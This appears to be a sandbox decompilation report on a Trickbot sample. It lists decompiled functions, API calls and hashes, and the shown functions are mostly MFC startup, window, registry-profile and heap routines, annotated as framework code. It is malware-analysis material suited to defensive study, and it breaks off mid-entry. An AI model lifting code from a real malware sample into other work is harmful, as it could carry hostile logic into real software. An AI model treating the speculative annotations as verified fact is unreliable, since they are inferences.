                          				intOrPtr _v12;
                          				void* _v16;
                          				void* _v24;
                          				void* _v32;
                          				char _v60;
                          				char _v64;
                          				void* _v68;
                          				char _t22;
                          				void* _t23;
                          				void* _t30;
                          				void* _t58;
                          				intOrPtr _t62;
                          				void* _t64;
                          
                          				_push(0xffffffff);
                          				_push(E00437602);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t62;
                          				_t58 = __ecx;
                          				E004321DE();
                          				E00431F4C(_t58, "Local AppWizard-Generated Applications");
                          				E00431642(_t58, 4); // executed
                          				_t22 = E0041BDEB(0x68);
                          				_t64 = _t62 - 0x28 + 4;
                          				_v60 = _t22;
                          				_t68 = _t22;
                          				_v12 = 0;
                          				if(_t22 == 0) {
                          					_t23 = 0;
                          					__eflags = 0;
                          				} else {
                          					_t23 = E0042189A(_t22, _t68, 0x80, 0x4399b8, 0x439de8, 0x439ac0);
                          				}
                          				_push(_t23);
                          				 *((intOrPtr*)(_t64 + 0x38)) = 0xffffffff;
                          				E00428784(_t58);
                          				E00431EFF(_t58);
                          				E00431F29(_t58, 1);
                          				E00431711(_t64 + 8);
                          				_v12 = 1;
                          				E004316BE(_t64 + 8);
                          				_push( &_v60);
                          				_t30 = E00431BAD(_t58); // executed
                          				_t69 = _t30;
                          				if(_t30 != 0) {
                          					E0041B7D3( *((intOrPtr*)(_t58 + 0x1c)), 5);
                          					E0041B53C(UpdateWindow( *( *((intOrPtr*)(_t58 + 0x1c)) + 0x1c)),  *((intOrPtr*)(_t58 + 0x1c)), 1);
                          					 *((intOrPtr*)(_t64 + 0x34)) = 0xffffffff;
                          					E0043176C( &_v64, __eflags);
                          					 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x2c));
                          					return 1;
                          				} else {
                          					_v12 = 0xffffffff;
                          					E0043176C(_t64 + 8, _t69);
                          					 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x28));
                          					return 0;
                          				}
                          			}

                          APIs
                            • Part of subcall function 00431642: __EH_prolog.LIBCMT ref: 00431647
                            • Part of subcall function 0041B7D3: ShowWindow.USER32(?,?), ref: 0041B7E1
                          • UpdateWindow.USER32(?), ref: 0040383F
                            • Part of subcall function 0041B53C: DragAcceptFiles.SHELL32(?,?), ref: 0041B543
                            • Part of subcall function 0043176C: __EH_prolog.LIBCMT ref: 00431771
                          Strings
                          • Local AppWizard-Generated Applications, xrefs: 00403770
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologWindow$AcceptDragFilesShowUpdate
                          • String ID: Local AppWizard-Generated Applications
                          • API String ID: 886253933-3869840320
                          • Opcode ID: b5bf1009b84e540c55149691f0975ee58853b81f5c25ad76d93bff12c1f5a915
                          • Instruction ID: 4bd1b33fc14f8b1641f6f29e9b9eb7fea5ed709321e4f56331090ace76b30e06
                          • Opcode Fuzzy Hash: b5bf1009b84e540c55149691f0975ee58853b81f5c25ad76d93bff12c1f5a915
                          • Instruction Fuzzy Hash: F721E4B4344740ABD214FF25C852B5E77E4AB8CB24F50561EF856873E1CFBC9941878A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 56%
                          			E00405159(char _a4) {
                          				void* _t2;
                          				void* _t7;
                          				intOrPtr _t8;
                          				void* _t13;
                          
                          				_t1 =  &_a4; // 0x402f6a
                          				_t8 =  *_t1;
                          				_t13 = _t8 -  *0x4482f4; // 0x3f8
                          				if(_t13 > 0) {
                          					L3:
                          					if(_t8 == 0) {
                          						_t8 = 1;
                          					}
                          					_t2 = RtlAllocateHeap( *0x44d0bc, 0, _t8 + 0x0000000f & 0xfffffff0); // executed
                          					return _t2;
                          				}
                          				E00408042(9);
                          				_push(_t8);
                          				_t7 = E0040852F();
                          				E004080A3(9);
                          				if(_t7 == 0) {
                          					goto L3;
                          				}
                          				return _t7;
                          			}

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,j/@,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040519E
                            • Part of subcall function 00408042: InitializeCriticalSection.KERNEL32(00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040807F
                            • Part of subcall function 00408042: EnterCriticalSection.KERNEL32(j/@,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A,00402F6A,00402F6A), ref: 0040809A
                            • Part of subcall function 004080A3: LeaveCriticalSection.KERNEL32(?,004053EE,00000009,j/@,0040808E,00000000,?,j/@,000000DC,0040516E,00000009,?,00000000,0040513D,000000E0,0040512A), ref: 004080B0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CriticalSection$AllocateEnterHeapInitializeLeave
                          • String ID: j/@
                          • API String ID: 495028619-13740958
                          • Opcode ID: 67373d9968ba6572620ea07a7e28c5e492e8e2e7a079d48d674eb8965deb7954
                          • Instruction ID: 851c18e36aa9611c9f2c034ca3ecedfd94dfcfed3f76d869e41ae1e3cab5b3cd
                          • Opcode Fuzzy Hash: 67373d9968ba6572620ea07a7e28c5e492e8e2e7a079d48d674eb8965deb7954
                          • Instruction Fuzzy Hash: 9DE06532D45D2176D52123297D0179B32119B42760F1A053BFD547F2D6DAB95C02469D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 86%
                          			E00431BAD(intOrPtr* __ecx) {
                          				void* __edi;
                          				intOrPtr _t31;
                          				void* _t32;
                          				intOrPtr _t34;
                          				void* _t45;
                          				intOrPtr _t46;
                          				intOrPtr _t47;
                          				intOrPtr* _t52;
                          				intOrPtr _t54;
                          				intOrPtr _t66;
                          				void* _t73;
                          				void* _t77;
                          
                          				E00405340(E00438281, _t73);
                          				_push(__ecx);
                          				_t66 =  *((intOrPtr*)(_t73 + 8));
                          				_t71 = __ecx;
                          				_t31 =  *((intOrPtr*)(_t66 + 0x10));
                          				_t54 = 1;
                          				 *((intOrPtr*)(_t73 - 0x10)) = _t54;
                          				if(_t31 == 0) {
                          					_t32 = E00432562();
                          					_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t32 + 4)))) + 0xc))(0xe100, 0, 0, 0);
                          					__eflags = _t34;
                          					if(_t34 == 0) {
                          						E004283A9(_t71);
                          					}
                          					__eflags =  *((intOrPtr*)(_t71 + 0x1c));
                          					L22:
                          					if(__eflags == 0) {
                          						 *((intOrPtr*)(_t73 - 0x10)) = 0;
                          					}
                          					L24:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
                          					return  *((intOrPtr*)(_t73 - 0x10));
                          				}
                          				_t77 = _t31 - _t54;
                          				if(_t77 == 0) {
                          					_push( *((intOrPtr*)(_t66 + 0x14)));
                          					__eflags =  *((intOrPtr*)( *__ecx + 0x7c))(); // FileOpen: OpenDocumentFile(rCmdInfo.m_strFileName)
                          					goto L22;
                          				}
                          				if(_t77 <= 0) {
                          					goto L24;
                          				}
                          				if(_t31 <= 3) {
                          					 *((intOrPtr*)(__ecx + 0x74)) = 0;
                          					_push( *((intOrPtr*)(_t66 + 0x14)));
                          					 *((intOrPtr*)( *__ecx + 0x7c))();
                          					_t52 = __ecx + 0xac;
                          					 *_t52 = _t66;
                          					// FilePrint/FilePrintTo: m_pMainWnd->SendMessage(WM_COMMAND, ID_FILE_PRINT_DIRECT)
                          					SendMessageA( *( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c), 0x111, 0xe108, 0);
                          					 *_t52 = 0;
                          					 *((intOrPtr*)(_t73 - 0x10)) = 0;
                          					goto L24;
                          				}
                          				if(_t31 == 4) {
                          					 *((intOrPtr*)(__ecx + 0x74)) = 0; // FileDDE: m_nCmdShow = SW_HIDE
                          					 *((intOrPtr*)(__ecx + 0xac)) =  *((intOrPtr*)(__ecx + 0x74));
                          					goto L24;
                          				}
                          				_t80 = _t31 - 5;
                          				if(_t31 != 5) {
                          					goto L24;
                          				}
                          				E00431F3B(__ecx, _t66);
                          				_t61 = __ecx;
                          				_t45 = E00431CEE(__ecx, _t80);
                          				if( *((intOrPtr*)(_t66 + 8)) == 0) {
                          					_t82 = _t45;
                          					// AfxMessageBox(nIDPrompt, MB_OK, (UINT)-1) unless the command line was run embedded:
                          					// AFX_IDP_UNREG_FAILURE (0xF10C) when Unregister() returned 0, AFX_IDP_UNREG_DONE (0xF10B) otherwise
                          					_push(0xffffffff);
                          					_push(0);
                          					if(_t45 == 0) {
                          						_push(0xf10c);
                          					} else {
                          						_push(0xf10b);
                          					}
                          					E00428683(_t61, _t82);
                          				}
                          				 *((intOrPtr*)(_t73 - 0x10)) = 0;
                          				if( *((intOrPtr*)(_t71 + 0xac)) == 0) {
                          					_t46 = E0041BDEB(0x24); // operator new(sizeof(CCommandLineInfo)); E00431711 is its constructor
                          					 *((intOrPtr*)(_t73 + 8)) = _t46;
                          					 *((intOrPtr*)(_t73 - 4)) = 0;
                          					if(_t46 == 0) {
                          						_t47 = 0;
                          						__eflags = 0;
                          					} else {
                          						_t47 = E00431711(_t46);
                          					}
                          					 *((intOrPtr*)(_t71 + 0xac)) = _t47;
                          					 *((intOrPtr*)(_t47 + 0x10)) = 5; // m_pCmdInfo->m_nShellCommand = CCommandLineInfo::AppUnregister
                          				}
                          				goto L24;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00431BB2
                          • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00431C94
                            • Part of subcall function 00431F3B: __EH_prolog.LIBCMT ref: 004334B0
                            • Part of subcall function 00431CEE: __EH_prolog.LIBCMT ref: 00431CF3
                            • Part of subcall function 00431CEE: RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00431DA3
                            • Part of subcall function 00431CEE: RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00431DBD
                            • Part of subcall function 00431CEE: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00431DD9
                            • Part of subcall function 00431CEE: RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00431DEE
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog$CloseEnumMessageOpenQuerySendValue
                          • String ID:
                          • API String ID: 941683902-0
                          • Opcode ID: 8617b720564136d3115f4e569a85e01bb61fcbef6e755ee4e443e6530e02ff62
                          • Instruction ID: 7bca6c3130a4eb32da602eb886af723c65e28acfa7fedb001bdca1799f0245df
                          • Opcode Fuzzy Hash: 8617b720564136d3115f4e569a85e01bb61fcbef6e755ee4e443e6530e02ff62
                          • Instruction Fuzzy Hash: 0E318C70780605DFDB249F6AC884A6AB7E4FF4C714F10692FE512DB3A0C778E9418B5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			// Consistent with MFC's CFrameWnd::LoadFrame(nIDResource, dwDefaultStyle, pParentWnd, pContext):
                          			// m_nIDHelp (+0x8c) = nIDResource, the window title is the resource string up to '\n' (0xa),
                          			// E0041B266(.., 8) matches AfxDeferRegisterClass(AFX_WNDFRAMEORVIEW_REG), E0042D5DC is
                          			// GetIconWndClass, E0042D44C is CFrameWnd::Create and E0042CDE1 is LoadAccelTable.
                          			E0042D65F(void* __ecx, void* __edx, void* __eflags) {
                          				signed short _t23;
                          				void* _t26;
                          				void* _t27;
                          				void* _t46;
                          				signed short _t48;
                          				void* _t52;
                          				void* _t54;
                          
                          				_t46 = __edx;
                          				E00405340(E00437F9C, _t54);
                          				_t48 =  *(_t54 + 8);
                          				_t52 = __ecx;
                          				 *(__ecx + 0x8c) = _t48;
                          				_t23 =  *0x447478; // 0x44748c
                          				 *(_t54 + 8) = _t23;
                          				_t39 = _t54 + 8;
                          				 *(_t54 - 4) = 0;
                          				if(E0041C67E(_t54 + 8, __eflags, _t48) != 0) {
                          					E0041C729(_t52 + 0xac,  *(_t54 + 8), 0, 0xa);
                          				}
                          				E0041B266(_t39, 8);
                          				_t26 = E0042D5DC(_t52,  *((intOrPtr*)(_t54 + 0xc)), _t48);
                          				_t49 = _t48 & 0x0000ffff;
                          				_t27 = E0042D44C(_t52, _t26,  *((intOrPtr*)(_t52 + 0xac)),  *((intOrPtr*)(_t54 + 0xc)), 0x44b2c0,  *((intOrPtr*)(_t54 + 0x10)), _t48 & 0x0000ffff, 0,  *((intOrPtr*)(_t54 + 0x14))); // executed
                          				if(_t27 != 0) {
                          					 *((intOrPtr*)(_t52 + 0x44)) = GetMenu( *(_t52 + 0x1c)); // m_hMenuDefault = ::GetMenu(m_hWnd)
                          					E0042CDE1(_t52, _t49);
                          					if( *((intOrPtr*)(_t54 + 0x14)) == 0) {
                          						E00419F94(_t46,  *(_t52 + 0x1c), 0x364, 0, 0, 1, 1); // SendMessageToDescendants(WM_INITIALUPDATE, 0, 0, TRUE, TRUE) when pContext == NULL
                          					}
                          					_push(1);
                          					_pop(0);
                          				}
                          				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
                          				E00417EC8(_t54 + 8);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
                          				return 0;
                          			}


                          APIs
                          • __EH_prolog.LIBCMT ref: 0042D664
                          • GetMenu.USER32(?), ref: 0042D6DE
                            • Part of subcall function 0041C729: lstrlenA.KERNEL32(?), ref: 0041C76D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologMenulstrlen
                          • String ID:
                          • API String ID: 2698981964-0
                          • Opcode ID: 6eb74efce72cb0325ea03ef84f0bc77673097709467e0b10ae5ef2160d13529c
                          • Instruction ID: 81f43602187463fccab8f433ff1bbbb83d7f3fbf6dccc082161f256b0f512f2e
                          • Opcode Fuzzy Hash: 6eb74efce72cb0325ea03ef84f0bc77673097709467e0b10ae5ef2160d13529c
                          • Instruction Fuzzy Hash: 40216F71600314BFDB20AF66DC81F9FBBB9EF45758F00802FB95696191CBB89D40CA64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (interactive graph with executed/not-executed colouring, not reproduced here): basic blocks 42d44c-42d4e1; calls to E00418005, E00432562, E00418D8E, LoadMenuA and DestroyMenu.
                          C-Code - Quality: 100%
                          			// Consistent with MFC's CFrameWnd::Create(lpszClassName, lpszWindowName, dwStyle, rect,
                          			// pParentWnd, lpszMenuName, dwExStyle, pContext): the menu is loaded from the module's
                          			// resource handle (module state +0xc), m_strTitle (+0xac) is set, E00418D8E is
                          			// CWnd::CreateEx with the rect unpacked, and the menu is destroyed if creation fails.
                          			E0042D44C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
                          				void* __ebp;
                          				intOrPtr _t19;
                          				void* _t23;
                          				void* _t24;
                          				struct HMENU__* _t32;
                          				struct HMENU__* _t39;
                          				intOrPtr* _t42;
                          
                          				_t39 = 0;
                          				_t32 = 0;
                          				_t42 = __ecx;
                          				if(_a24 == 0) {
                          					L3:
                          					E00418005(_t42 + 0xac, _a8);
                          					_t19 = _a20;
                          					if(_t19 != _t39) {
                          						_t39 =  *((intOrPtr*)(_t19 + 0x1c));
                          					}
                          					// _t20 is an undeclared decompiler temporary aliasing _a16 (the RECT): width = right - left, height = bottom - top
                          					_t23 = E00418D8E(_t42, _a28, _a4, _a8, _a12,  *_a16,  *((intOrPtr*)(_a16 + 4)),  *((intOrPtr*)(_t20 + 8)) -  *_a16,  *((intOrPtr*)(_t20 + 0xc)) -  *((intOrPtr*)(_a16 + 4)), _t39, _t32, _a32); // executed
                          					if(_t23 != 0) {
                          						_t24 = 1;
                          						return _t24;
                          					} else {
                          						if(_t32 != 0) {
                          							DestroyMenu(_t32);
                          						}
                          						L8:
                          						return 0;
                          					}
                          				}
                          				_t32 = LoadMenuA( *(E00432562() + 0xc), _a24);
                          				if(_t32 != 0) {
                          					goto L3;
                          				}
                          				 *((intOrPtr*)( *_t42 + 0xa4))();
                          				goto L8;
                          			}


                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Menu$DestroyLoad
                          • String ID:
                          • API String ID: 588275208-0
                          • Opcode ID: 47706853f4a671cbe104dc52890ef924e078594bc0a3af00a58dfdc5d928a944
                          • Instruction ID: e96ebaf92d5899408bf20514e4ca51ab90cfcc3861e976c03ff266611ec7aa21
                          • Opcode Fuzzy Hash: 47706853f4a671cbe104dc52890ef924e078594bc0a3af00a58dfdc5d928a944
                          • Instruction Fuzzy Hash: 5A11E776700215BFDB109F65DC84CAB7BA9FF98360B05802AFD06C7221C675EC10CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			// Consistent with MFC's CRecentFileList::ReadList(): a buffer of length(m_strEntryFormat)+5 is
                          			// allocated (E0041BDEB = operator new, E0041BE14 = delete), each entry name is built with
                          			// wsprintfA(buf, m_strEntryFormat, i + 1) and read with CWinApp::GetProfileString (E004320CD)
                          			// from m_strSectionName into m_arrNames[i] (E00417FB5 = CString assignment). The profile
                          			// reads land in the app's own HKCU section, framework behaviour rather than malware logic.
                          			E0041E873(void* __ebx, void* __ecx) {
                          				void* __esi;
                          				void* _t31;
                          				void* _t33;
                          				void* _t38;
                          				signed int _t43;
                          				signed int _t53;
                          				void* _t56;
                          				void* _t58;
                          				void* _t60;
                          				void* _t61;
                          
                          				E00405340(E0043886C, _t58);
                          				_t61 = _t60 - 0xc;
                          				_t56 = __ecx;
                          				 *(_t58 - 0x10) = E0041BDEB( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 8)) + 5);
                          				_t31 = E00432562();
                          				_t53 = 0;
                          				_t63 =  *((intOrPtr*)(_t56 + 4));
                          				 *((intOrPtr*)(_t58 - 0x14)) =  *((intOrPtr*)(_t31 + 4));
                          				if( *((intOrPtr*)(_t56 + 4)) > 0) {
                          					_push(__ebx);
                          					do {
                          						_t8 = _t53 + 1; // 0x1
                          						_t43 = _t8;
                          						wsprintfA( *(_t58 - 0x10),  *(_t56 + 0x10), _t43); // wsprintf(pszEntry, m_strEntryFormat, iMRU + 1)
                          						_t61 = _t61 + 0xc;
                          						_t38 = E004320CD(_t43,  *((intOrPtr*)(_t58 - 0x14)), _t56, _t63, _t58 - 0x18,  *((intOrPtr*)(_t56 + 0xc)),  *(_t58 - 0x10), 0x449788); // executed; pApp->GetProfileString(m_strSectionName, pszEntry, "")
                          						 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                          						E00417FB5( *((intOrPtr*)(_t56 + 8)) + _t53 * 4, _t58, _t38);
                          						 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
                          						E00417EC8(_t58 - 0x18);
                          						_t53 = _t43;
                          					} while (_t53 <  *((intOrPtr*)(_t56 + 4)));
                          				}
                          				_t33 = E0041BE14( *(_t58 - 0x10));
                          				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
                          				return _t33;
                          			}


                          APIs
                          • __EH_prolog.LIBCMT ref: 0041E878
                          • wsprintfA.USER32 ref: 0041E8B5
                            • Part of subcall function 004320CD: __EH_prolog.LIBCMT ref: 004320D2
                            • Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog$DecrementInterlockedwsprintf
                          • String ID:
                          • API String ID: 1290063344-0
                          • Opcode ID: 0ada101ca65a763d7fea820928f5acd1231f5d235357106bcd8a8491be9f5aed
                          • Instruction ID: bf8af694554d894f91cb280a2967081886eeaf55389991163a7f1de5d21ccf1c
                          • Opcode Fuzzy Hash: 0ada101ca65a763d7fea820928f5acd1231f5d235357106bcd8a8491be9f5aed
                          • Instruction Fuzzy Hash: DE116071900606DFCB14EF69C9859AEF7F8FF54318F10452EE026A3251DB78AD45CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			// Consistent with MFC's CWinApp::GetSectionKey(lpszSection): E00431F87 is GetAppRegistryKey,
                          			// which opens/creates HKEY_CURRENT_USER\Software\<company>\<app> (the "software" argument in
                          			// the subcall list), then the section key is created beneath it. 0x2001F is KEY_READ|KEY_WRITE.
                          			// The two _push(__ecx) calls are the decompiler's rendering of local-variable stack space.
                          			E0043201B(intOrPtr __ecx, char* _a4) {
                          				void* _v8;
                          				int _v12;
                          				void* _t6;
                          				void* _t11;
                          				void* _t14;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_v8 = 0;
                          				_t6 = E00431F87(__ecx); // executed
                          				_t14 = _t6;
                          				if(_t14 != 0) {
                          					RegCreateKeyExA(_t14, _a4, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed; RegCreateKeyEx(hAppKey, lpszSection, 0, REG_NONE, REG_OPTION_NON_VOLATILE, KEY_READ|KEY_WRITE, NULL, &hSectionKey, &dwDisposition)
                          					RegCloseKey(_t14); // executed
                          					_t11 = _v8;
                          				} else {
                          					_t11 = 0;
                          				}
                          				return _t11;
                          			}


                          APIs
                            • Part of subcall function 00431F87: RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
                            • Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
                            • Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00431FF7
                            • Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432007
                            • Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432011
                          • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,?,00000000,?,?,?,?,004288CA,?), ref: 0043204B
                          • RegCloseKey.KERNEL32(00000000,?,?,?,?,004288CA,?,00000000), ref: 00432052
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseCreate$Open
                          • String ID:
                          • API String ID: 1740278721-0
                          • Opcode ID: 3140004da408bb3239cb69cf8b6d7a668bf622e0d09585c28f15779b78e31d14
                          • Instruction ID: e8dbd2d74003cfe877a5d89efd4f32299761e86c5a92388a5b86f1dfcf205820
                          • Opcode Fuzzy Hash: 3140004da408bb3239cb69cf8b6d7a668bf622e0d09585c28f15779b78e31d14
                          • Instruction Fuzzy Hash: D8E06D76501038BB8B259B96DC49CEFBF7CEF8E7A0B100026F605D2100D6B49A05D6F9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Consistent with MFC's AfxWinInit(hInstance, hPrevInstance, lpCmdLine, nCmdShow): the
                          			// instance handle is stored in the module state (+8, +0xc), then copied with the other
                          			// arguments into CWinApp (m_hInstance, m_hPrevInstance, m_lpCmdLine, m_nCmdShow at
                          			// +0x68..+0x74) before CWinApp::SetCurrentHandles (E00433BB8, hence GetModuleFileNameA and
                          			// the .HLP/.INI strings) and AfxInitThread (E0041C021) when not running inside a DLL.
                          			E00433B55(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				signed short _t13;
                          				void* _t16;
                          				intOrPtr _t18;
                          				void* _t20;
                          				intOrPtr _t29;
                          
                          				_t13 = SetErrorMode(0); // executed; query the current mode
                          				// 0x8001 = SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX: suppresses OS error dialogs.
                          				// Every MFC application does this in AfxWinInit, so on its own it is not an evasion indicator.
                          				SetErrorMode(_t13 | 0x00008001); // executed
                          				_t16 = E00432562();
                          				_t29 = _a4;
                          				 *((intOrPtr*)(_t16 + 8)) = _t29;
                          				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
                          				_t18 =  *((intOrPtr*)(E00432562() + 4));
                          				_t31 = _t18;
                          				if(_t18 != 0) {
                          					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
                          					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
                          					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
                          					 *((intOrPtr*)(_t18 + 0x74)) = _a16;
                          					E00433BB8(_t18, _t31); // executed
                          				}
                          				if( *((char*)(E00432562() + 0x14)) == 0) {
                          					E0041C021();
                          				}
                          				_t20 = 1;
                          				return _t20;
                          			}


                          APIs
                          • SetErrorMode.KERNELBASE(00000000,00000000,0041E93B,00000000,00000000,00000000,00000000,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000,00405287), ref: 00433B5E
                          • SetErrorMode.KERNELBASE(00000000,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000,00405287,00000000), ref: 00433B65
                            • Part of subcall function 00433BB8: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00433BE9
                            • Part of subcall function 00433BB8: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00433C8A
                            • Part of subcall function 00433BB8: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00433CB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                          • String ID:
                          • API String ID: 3389432936-0
                          • Opcode ID: 634ff82155919c59adbf0de0d4feaa2c6d5cc4625fdd2e30a239f961e6f0c57b
                          • Instruction ID: 63e4ef7212027fca72b37c035b56a8b925f32eef7eff3c7c91452b5a015d8c70
